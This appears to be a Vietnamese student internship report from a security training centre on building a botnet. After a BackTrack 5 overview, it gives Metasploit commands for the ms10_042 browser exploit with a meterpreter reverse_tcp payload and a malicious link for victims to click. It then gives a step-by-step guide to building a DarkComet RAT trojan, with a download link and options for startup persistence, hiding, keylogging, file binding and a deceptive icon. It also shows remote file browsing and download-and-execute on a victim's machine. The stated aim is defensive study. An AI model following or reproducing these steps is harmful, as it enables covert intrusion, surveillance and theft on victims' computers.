SlideShare une entreprise Scribd logo
1  sur  38
Télécharger pour lire hors ligne
Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh
Mạng Quốc Tế Athena

ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới
zombie, botnet trên hệ thống mạng
GVHD: Võ Đỗ Thắng
Sinh viên thục hiện:
- NguyễnVăn Luân
TP. Hồ Chí Minh, tháng 8 năm 2014
MỤC LỤC
LỜI MỞ ĐẦU........................................................................................................................... 2
1. Sự cần thiết của đề tài...................................................................................................... 2
2. Mục tiêu nghiên cứu........................................................................................................ 2
3. Phương pháp nghiên cứu.................................................................................................. 2
4. Kết cấu đề tài ................................................................................................................. 2
LỜI CẢM ƠN.............................................................................................................................. 4
NHẬN XÉT CỦA GIÁO VIÊN .......................................................................................................... 5
PHẦN 1 : GIỚI THIỆU VỀ BACKTRACK 5 ............................................................................... 6
1. Giới thiệu ...................................................................................................................... 6
2. Mục đích ....................................................................................................................... 6
3. Cài đặt........................................................................................................................... 7
PHẦN 2: TRIỂN KHAI TRONG MÔI TRƯỜNG LAN ............................................................... 14
1. Mô phỏng mạng LAN ................................................................................................... 14
.......................................................................................................................................... 14
2. Thử nghiệm xâm nhập bằng Metasploit ........................................................................... 14
PHẦN 3: XÂY DỰNG BOTNET BẰNG DARKCOMET ............................................................ 18
1. Giới thiệu DarkComet ................................................................................................... 18
2. Cài đặt DarkComet ....................................................................................................... 18
HƯỚNG PHÁT TRIỂN............................................................................................................ 35
KẾT LUẬN ............................................................................................................................ 36
TÀI LIỆU THAM KHẢO ......................................................................................................... 37
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 2
LỜI MỞ ĐẦU
1. Sự cần thiết của đề tài
Trong các kiểu tấn công hệ thống trên internet, tấn công DDoS (Distributed Denial of
Service) là cách tấn công đơn giản, hiệu quả và khó phòng chống bậc nhất. DDoS là
cách tấn công dựa vào việc gửi số lượng lớn yêu cầu (request) đến hệ thống nhằm
chiếm dụng tài nguyên, làm cho hệ thống quá tải, không thể tiếp nhận và phục vụ các
yêu cầu từ người dùng thực sự. Ví dụ điển hình là vào tháng 7 năm 2013, hàng loạt các
trang báo điện tử của Việt Nam như Vietnamnet, Tuổi Trẻ Online, Dân Trí, Thanh niên
Online bị tấn công dẫn đến không thể truy cập được trong nhiều tuần lễ liên tiếp. Theo
thống kê từ Abort Network, đầu năm 2014 có hơn 100 vụ tấn công DDoS trên
100Gbps, 5733 vụ tấn công đạt 20Gbps gấp hơn hai lần năm 2013.
Để có thể tạo được số lượng yêu cầu đủ lớn để đánh sập hệ thống mục tiêu, các hacker
thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến hàng triệu máy.
Vì vậy, nghiên cứu về cách xây dựng mạng lưới zombie, botnet sẽ giúp chúng ta hiểu
hơn về cách hoạt động, từ đó xây dựng các biện pháp phòng ngừa sự phát triển của hệ
thống zombie, botnet.
2. Mục tiêu nghiên cứu
Đề tài nghiên cứu trên hai môi trường:
Giai đoạn 1: Trong môi trường mạng LAN, tìm ra được các lỗ hổng bảo mật trên các
máy trong mạng, thử xâm nhập trên các máy.
Giai đoạn 2: Trong môi trường Internet, dùng DarkComet để thử tạo, phát tán và điểu
khiển mạng lưới botnet thông qua mạng Internet.
3. Phương pháp nghiên cứu
Giai đoạn 1: Sử dụng ảo hóa VMware để mô phỏng môi trường mạng LAN. Cài đặt
Backtrack trên một máy ảo VMware. Sau đó thực hiện thâm nhập từ máy Backtrack tới
một mục tiêu.
Giai đoạn 2: Cài đặt và tạo bot trên VPS (Virtual Private Server) và phát tán trên
mạng. Sau đó thực hiện xâm nhập, kiểm soát từ xa thông qua địa chỉ IP public của
VPS.
4. Kết cấu đề tài
Phần 1: Giới thiệu về Backtrack 5
Phần 2: Triển khai trong môi trường LAN
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 3
Phần 3: Triển khai xây dựng botnet bằng DarkComet
Kết luận
Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ trợ tận tình của
Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều kiến thức quý báo. Đặc biệt
là quá trình thực tập tại Trung tâm ATHENA giúp chúng em có những trải nghiệm vô cùng
thú vị và bổ ích. Với mong muốn tìm hiểu về mạng máy tính và góp phần xây dựng một
mạng máy tính thân thiện, thông minh cho mọi người sử dụng.
Tuy đã có rất nhiều cố gắng song không thể tránh những khuyết điểm, sai sót. Vì thế mong
được sự thông cảm và những ý kiến đóng góp quý báo từ Quý Thầy Cô, bạn bè, bạn đọc để
chúng em có thể ngày một hoàn thiện đề tài đã chọn một cách tốt hơn nữa. Xin chân thành
cảm ơn
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 4
LỜI CẢM ƠN
Thực tập là quá trình tham gia học hỏi, so sánh, nghiên cứu và ứng dụng
những kiến thức đã học vào thực tếcông việc ở cáccơ quan quản lý hành chính nhà nước và các công
việc sau này. Với nhiều kiến thức còn bỡ ngỡ của một sinh viên năm cuối, chuyên ngành công nghệ
thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM, chúng em đã được tham gia trong suốt
quá trình thực tập tại trung tâmAthena.
Tại đây chúng em đã nhận được nhiều sự hỗ trợ và giúp đỡ của các bạn bè đồng nghiệp và đặc biệt là
sự tận tình, chu đáo của thầy Võ Đỗ Thắng, giám đốc Trung tâm đào tạo và quản trị mạng an ninh quốc
tế. Cùng với sự hỗ trợ từ phía nhà trường, xin gởi lời cảm ơn chân thành đến quý Thầy Cô khoa công
nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM đã tạo điều kiện tốt nhất để chúng
em hoàn thành khóa thực tậpnày.
Với sự nỗ lực của bản thân và sự hỗ trợ giúp đỡ, kiến thức ban đầu vẫn còn nhiều hạn chế, vì vậy
không tránh khỏi những thiếu sót trong quá trình hoàn thành báo cáo. Mong nhận được nhiều đóng
góp ý kiến của quý Thầy Cô cũng như nhiều bạn cùng chuyên môn đểcó thể nắm vững kiến thức hơn.
Sau cùng, chúng em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng
lời chúc sức khỏe, niềm tin đểtiếp tục thực hiện sứ mệnh cao đẹp của mình_ truyền đạt kiến thức cho
thế hệ mai sau.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 5
XÁC NHẬN CỦA CƠ QUAN
THỦ TRƯỞNG
(ký tên, đóng dấu)
NHẬN XÉT CỦA GIÁO VIÊN
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
..................................................................................................................................................
…...., ngày….tháng….năm 2014
CÁN BỘ HƯỚNG DẪN
(ký tên)
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 6
PHẦN 1 : GIỚI THIỆU VỀ BACKTRACK 5
1. Giới thiệu
Backtrack là bản phân phối dựa trên GNU/LINUX Debian nhắm mục đích pháp y kỹ
thuật số và sử dụng thử nghiệm thâm nhập.Việc phân phối Backtrack có nguồn gốc từ
sự hợp nhất của hai phân phối trước đây là cạnh tranh mà tập trung vào thử nghiệm
thâm nhập: WHAX và Auditor Security Collection.
2. Mục đích
Backtrack 5 có các công cụ được sử dụng cho quá trình thử nghiệm xâm nhập. Các
công cụ kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau :
1. Information gathering: loại này có chứa một số công cụ có thể được sử dụng
để có được thông tin liên quan đến mục tiêu DNS,định tuyến, địa chỉ
email,trang web,máy chủ mail…Thông tin này được thu thập từ các thông
tin có sẵn trên internet,mà không cần chạm vào môi trường mục tiêu.
2. Network mapping: loại này chứa một số công cụ có thể được sử dụng để có
kiểm tra các host đang tôn tại,thông tin về OS,ứng dụng được sử dụng bởi
mục tiêu,và cũng làm portscanning.
3. Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các
công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng
chứa các công cụ để thực hiện và phân tích Server Message Block (SMB)
và Simple Network Management Protocol (SNMP).
4. Web application analysis: loại này chứa các công cụ có thể được sử dụng
trong theo dõi, giám sát các ứng dụng web.
5. Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận
dạng tần số vô tuyến (RFID).
6. Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các
lỗ hổng tìm thấy trong các máy tính mục tiêu.
7. Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các
máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để
nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất.
8. Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong
việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần
để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt
công cụ để duy trì quyền truy cập.
9. Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các
công cụ trong thể loại này.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 7
10. Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ
có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa
cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các
công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack
Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn
kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn
tính toàn vẹn.
11. Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để
gỡ rối chương trình một hoặc tháo rời một tập tin thực thi.
3. Cài đặt
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack-
linux.org/downloads/, có bản cho Vmware và file ISO.
1. Live DVD
Nếu chúng ta muốn sử dụng Backtrack mà không cần cài nó vào ổ cứng,
chúng ta có thể ghi tập tin ảnh ISO vào đĩa DVD, và khởi động máy tính
của chúng ta với DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế của
việc sử dụng Backtrack là một DVD Live là nó là rất dễ dàng để làm và
chúng ta không cần phải gây rối với cấu hình máy hiện tại của chúng ta.
Tuy nhiên, phương pháp này cũng có một số nhược điểm. Backtrack có thể
không làm việc với phần cứng, và thay đổi cấu hình nào được thực hiện trên
phần cứng để làm việc sẽ không được lưu với đĩa DVD Live. Ngoài ra, nó
là chậm, vì máy tính cần phải tải các chương trình từ đĩa DVD.
2. Install
 Cài đặt trong máy thật
Chúng ta cần chuẩn bị một phân vùng để cài đặt Backtrack. Sau đó chạy
Backtrack Live DVD. Khi gặp màn hình login, ta sử dụng username là root,
pass là toor. Sau đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ
họa của Backtrack 5.
Để cài đặt Backtrack 5 đến đĩa cứng ta chọn tập tin có tên install.sh trên
desktop và tiến hành cài đặt. Tuy nhiên, nếu không thể tìm thấy tập tin,
chúng ta có thể sử dụng ubiquity để cài đặt. Để sử dụng ubiquity, ta mở
Terminal gõ ubiquity. Sau đó cửa sổ cài đặt sẽ hiển thị. Sau đó trả lời 1 số
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 8
câu hỏi như thành phố chúng ta đang sống, keyboard layout, phân vùng ổ
đĩa cài đặt,… Sau đó tiến hành cài đặt.
 Cài đặt trong máy ảo
Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và
sử dụng đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng
được wireless trừ USB wireless.
Ta có thể có thể sử dụng file VMWare được cung cấp bởi BackTrack. Từ
đây chúng ta có BackTrack trên máy ảo thật dễ dàng và nhanh chóng. Cấu
hình trong file VMWare là memory 768MB, hardisk :30GB, Network:NAT.
Để sử dụng được card mạng thật, ta phải chọn Netword là Briged
Dưới đây làm một số hình ảnh khi cài BackTrack trên máy ảo VMWare
Tạo một máy ảo mới và cho đia BackTrack vào
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 9
Giao diện khởi động của BackTrack
Gõ startx để vào chế độ đồ họa trong BackTrack
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 10
Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 11
Chọn ngôn ngữ, chọn Tiếp để tiếp tục
Chọn múi giờ, chọn Tiếp để tiếp tục
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 12
Chọn ngôn ngữ bàn phím, chọn Forward để tiếp tục
Chọn phân vùng để cài, chọn Tiếp để tiếp tục
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 13
Nhấn Cài đặt để bắt đầu cài
Quá trình cài đã bắt đầu.
Sau khi hoàn tất, chúng ta khởi động lại
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 14
PHẦN 2: TRIỂN KHAI TRONG MÔI TRƯỜNG
LAN
1. Mô phỏng mạng LAN
Mô hình mạng LAN được mô phỏng:
Để chỉ định máy ảo sử dụng Bridge ảo VMnet0, trong giao diện VMware, kích
chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn mục Network
Adapter, sau đó trong mục Network Connection, chọn tùy chọn Bridged
2. Thử nghiệm xâm nhập bằng Metasploit
Trong Backtrack5r3, chúng ta sử dụng công cụ Metasploit để thực hiện xâm nhập.
Để khởi động giao diện Console của Metasploit, trong Terminal, gõ lệnh
msfconsole.
Switch
PC1 PC2 PC3
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 15
Để sử dụng một module nào đó, chúng ta sử dụng cú pháp:
use <Đường dẫn đến module>
VD: khai thác lỗi ms10_042
Sử dụng lệnh search ms10_042 để tìm ra moudle cần dùng
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 16
use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec-> Enter
Các thiết lập:
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.101
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 17
set LHOST 192.168.1.101
exploit
Sau khi exploit, Metasploit sẽ tạo một link chứa mã độc (http://192.168.1.101:80/),
chỉ cần nạn nhân click vào link thì mã độc sẽ được gửi sang máy nạn nhân và sau
đó có thể chiếm quyền máy.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 18
PHẦN 3: XÂY DỰNG BOTNET BẰNG
DARKCOMET
1. Giới thiệu DarkComet
DarkComet là một công cụ quản trị từ xa (Remote Administrator Tool) miễn phí rất
nổi tiếng, Tuy nhiên mình thấy Dark Comet là một soft đơn giản cực kì lợi hại và
nguy hiểm, với các tính năng như:
+ Remote Desktop Như TeamViewer nhưng không cần sự đồng ý.
+ Xem các thư mục của máy victim, ăn cắp tài liệu từ máy victim.
+ Có thể tạo, đọc và xóa các thư mục trong máy victim.
+ Xem lén Webcam của victim.
+ Nghe trộm qua microphone của victim.
+ Mở website bất kì mà không cần sự đồng ý của victim.
+ Chat với victim (cái này fê phết, victim còn đíu tắt được cơ)
+ Keylog có thể xem luôn hoặc về email.
+ Xem regedit
+ Có thể sử dung chức năng ctrl + alt + del, Task Manager
+ Download file và chạy bình thường hoặc là ẩn ( Send sang máy victim thêm vài
con trojan nữa chẳng hạn)
+ Khởi động cùng win con trojan đó…
Dự án DarkComet RAT đã phát hành bản chính thức cuối cùng là DarkComet RAT
v5.4.1 Legacy vào ngày 1/10/2012.
2. Cài đặt DarkComet
Bản darkcomet dùng trong báo cáo được tải từ:
http://www.mediafire.com/download/37bd1c0acbd2p6c/darkcomet+5.3.1.rar.
Chạy DarkComet trên linux:
Tải bản DarkComet về, giải nén vào thư mục darkcomet5.3.1RAT dùng lệnh: unzip
darkcomet5.3.1RAT.
Mở terminal, chuyển thư mục làm việc hiện hành về darkcomet5.3.1RAT.
Dùng lệnh wine darkcomet để khởi động DarkComet: wine darkcomet
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 19
Giao diện quản lí các bot của DarkComet, chờ đợi các kết nối tới:
Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to
new port(+Listen)
Điền cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận
Giao diện thêm socket lắng nghe
Ta có thể thêm cổng lắng nghe khác nếu muốn.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 20
Tạo trojan:
Trojan có thể được tạo từ bất kì máy windows nào. Các bước tạo trojan:
- Download DarkComet v 531
- Sau đó giải nén file DarkComet531RAT.zip
- Vào thư mục giải nén, chạy file DarkComet.exe
- Ch úng ta c ó 2 t ùy ch ọn. ch ọn option c ủa tro jan theo m ặc đ ịnh (DarkComet ->
Server module-> Minimalist) ho ặc t ùy ch ọn (DarkComet -> Server module->
Full Editor)
Giao diện tùy chọn:
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 21
Các cài đặt:
+ Main settings
- Password
- server ID,
- profile name
- tùy chọn bypass tường lửa
+ Network Settings
- Cài đặt IP sẽ lắng nghe các bot và cổng lắng nghe của server.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 22
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 23
+ Module Startup
Tùy chọn bot có khởi động cùng Windows hay không.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 24
+ Install Message
Hiển thị hộp thoại thông báo và nội dung khi nạn nhân chạy chương
trình bot hay không
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 25
+ Module Shield:
Các tùy chọn giúp bot ẩn
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 26
+ Keylogger
Tùy chọn ghi log bàn phím, địa chỉ tải log.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 27
+ File Binder
Tùy chọn đính kèm file khác.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 28
+ Choose Icon
Tùy chọn một icon để tạo sự tin tưởng cho nạn nhân.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 29
+ Stub Finalization
Tùy chọn định dạng xuất file trojan (.exe, .com, .bat, .pif, .scr), tùy chọn
cách nén file trojan và lưu các cài đặt để sử dụng lại.
Sau khi đã cài đặt xong các tùy chọn, chọn Build The Stub và chọn nơi lưu để tạo
trojan.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 30
Giao diện quản lí users:
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 31
Giao diện điều khiển user:
Demo điều khiển máy nạn nhân
Xem thông tin máy nạn nhân
Trong giao diện điều khiển user, vào tab Comuter Information để xem thông tin máy nạn
nhân. Nếu thông tin chưa hiển thị, nhấn Refresh để hiển thị.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 32
Quản lý file
Trong giao diện điều khiển user, vào mục Files manager - > Explorer files
Ta có giao diện quản lý files trong máy nạn nhân
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 33
Cột bên trái là các thư mục trong máy chủ (server), cột bên phải là các thư mục trong máy
nạn nhân. DarkComet có toàn quyền với máy nạn nhân nên ta có thể duyệt thư mục, thêm,
sửa, xóa các thư mục hay file trong máy nạn nhân. Ví dụ duyệt thư mục C:
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 34
Xem danh sách các port đang mở trên máy nạn nhân
Trong giao diện quản lý user, vào Network Functions -> Active ports.
Trên bảng điều khiển, ta thấy được các process nào đang dùng port nào, trạng thái port.
Đồng thời ta còn có thể tắt những process đang chạy bằng cách nhấp chuột phải vào
process muốn tắt và chọn Kill process ID.
Điều khiển máy nạn nhân download và thực thi một file
Từ giao diện điều khiển user, vào Network Funtions -> Url download.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 35
Chọn nơi lưu trữ file tại ô Destination Path
Chọn đường dẫn download tại ô Download from.
Tùy chọn file có thực thi ngay sau khi download thành công bằng cách tick vào ô Execute
the file after download.
Sau khi thiết lập xong các tùy chọn, nhấn Add để thêm vào danh sách đợi lệnh, nhấn
Launch Process để thực thi lệnh.
Ví dụ: download và mở một file html tại http://webdesignerbk10.tk/index.html, lưu file tại
Desktop. Kết quả: trên Desktop máy nạn nhân có file index.html và trình duyệt mặc định
của máy nạn nhân mở file này lên.
HƯỚNG PHÁT TRIỂN
Công nghệ thông tin là ngành đang phát triển rất mạnh ở Việt Nam. Theo số liệu từ “Sách
trắng Công nghệ thông tin – Truyền thông 2013”, cả nước có trên 1300 trang thông tin
điện tử, 420 trang mạng xã hội được cấp phép. Đi cùng với sự phát triển này là số lượng
các máy chủ (server) phục vụ các trang mạng, máy tính để bàn (PC), máy tính xách tay
(laptop) cũng tăng lên rất nhanh. Nếu không có các biện pháp bảo mật nghiêm ngặt thì đây
là môi trường rất thuận lợi cho sự phát triển của botnet, zombie.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 36
Để tiếp tục phát triển và đáp ứng yêu cầu thực tế, đề tài này cần nghiêng cứu mở rộng theo
các hướng:
Các phương pháp bypass các antivirus hiện tại
Các loại bot phổ biến và nguy hiểm khác
Các cách phát tán botnet
Các cách khai thác botnet
Các phương pháp hiệu quả để phòng chống trở thành zombie, botnet
KẾT LUẬN
Từ khi ra đời đến nay, mạng internet luôn tiềm ẩn nguy các nguy cơ bảo mật. Tìm hiểu về
mạng lưới zombie, botnet rất có ích cho người dùng phổ thông, giúp hạn chế nguy cơ bị
biến thành botnet. Đề tài này càng có ít cho người quản trị hệ thống, giúp hiểu rõ cơ chế
hoạt động của mạng lưới zombie, botnet, từ đó đề ra các biện pháp phòng ngừa thích hợp.
Trung tâm đào tạo Quản trị và An ninh mạng Athena
ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 37
TÀI LIỆU THAM KHẢO
3. Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “TÀI LIỆU
HƯỚNG DẪN VÀ SỬ DỤNG BACKTRACK 5 ĐỂ KHAI THÁC LỖ
HỔNG MẠNG TẠI TRUNG TÂM ATHENA”
4. Trung tâm đào tạo Quản trị mạng & An ninh mạng Athena, “Bảo mật mạng
– Bí quyết và giải pháp”
5. Diễn đàn Athena, http://athena.edu.vn/forum/forum.php
6. http://www.arbornetworks.com/corporate/blog/5243-volumetric-with-a-
capital-v

Contenu connexe

Tendances

đồ áN thực tập tại athena
đồ áN thực tập tại athenađồ áN thực tập tại athena
đồ áN thực tập tại athena
Huy Bach
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong
Phong Hoang
 
Bao cao cuoi khoa
Bao cao cuoi khoaBao cao cuoi khoa
Bao cao cuoi khoa
Nat Galacticos
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi ky
lehuyvinh
 
Bao cao thuc tap athena - Phạm Thành Phước
Bao cao thuc tap athena - Phạm Thành PhướcBao cao thuc tap athena - Phạm Thành Phước
Bao cao thuc tap athena - Phạm Thành Phước
thanhphuocbt
 
Báo cáo thực tập cuối kì tô thị hường
Báo cáo thực tập cuối kì   tô thị hườngBáo cáo thực tập cuối kì   tô thị hường
Báo cáo thực tập cuối kì tô thị hường
Hường Tô
 

Tendances (17)

đồ áN thực tập tại athena
đồ áN thực tập tại athenađồ áN thực tập tại athena
đồ áN thực tập tại athena
 
System hacking_Athena
System hacking_AthenaSystem hacking_Athena
System hacking_Athena
 
[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong[Athena] Báo cáo thực tập - Mai Hoàng Phong
[Athena] Báo cáo thực tập - Mai Hoàng Phong
 
Luan van
Luan vanLuan van
Luan van
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi ky
 
Bao cao cuoi khoa
Bao cao cuoi khoaBao cao cuoi khoa
Bao cao cuoi khoa
 
ictf_2018_WannaCry-Dich.pdf
ictf_2018_WannaCry-Dich.pdfictf_2018_WannaCry-Dich.pdf
ictf_2018_WannaCry-Dich.pdf
 
Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi ky
 
Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)
Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)
Cẩm nang dạy học an toàn trực tuyến (phiên bản đầu tiên)
 
Baocao athena
Baocao athenaBaocao athena
Baocao athena
 
Bao cao thuc tap athena - Phạm Thành Phước
Bao cao thuc tap athena - Phạm Thành PhướcBao cao thuc tap athena - Phạm Thành Phước
Bao cao thuc tap athena - Phạm Thành Phước
 
Báo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam AthenaBáo Cáo Cuối Khóa trung tam Athena
Báo Cáo Cuối Khóa trung tam Athena
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Báo cáo thực tập cuối kì tô thị hường
Báo cáo thực tập cuối kì   tô thị hườngBáo cáo thực tập cuối kì   tô thị hường
Báo cáo thực tập cuối kì tô thị hường
 
Thuyết trình Athena - Website tin tức Joomla
Thuyết trình Athena - Website tin tức JoomlaThuyết trình Athena - Website tin tức Joomla
Thuyết trình Athena - Website tin tức Joomla
 
BÁO CÁO THỰC TẬP CUỐI KHÓA - TRUNG TÂM ATHENA
